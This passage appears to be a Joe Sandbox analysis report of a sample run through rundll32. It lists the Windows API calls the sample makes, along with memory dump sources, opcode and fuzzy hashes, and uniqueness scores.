                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction ID: 44ba6f7c8c4d87fab9365827d96dd2610bd0c5aaa7a7505ecb33efb7383b78fb
                                                                                                                      • Opcode Fuzzy Hash: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction Fuzzy Hash: 2BC14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                      • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      • Opcode ID: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction ID: 16a76d7c805c79391281f5fd2ee222f5103365245b1589172f68e38ef912b2cf
                                                                                                                      • Opcode Fuzzy Hash: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction Fuzzy Hash: B62127755002556FDB21DFB49C81BAEB7F8DF59241FA14066F984D7240DB709A40CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                      • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
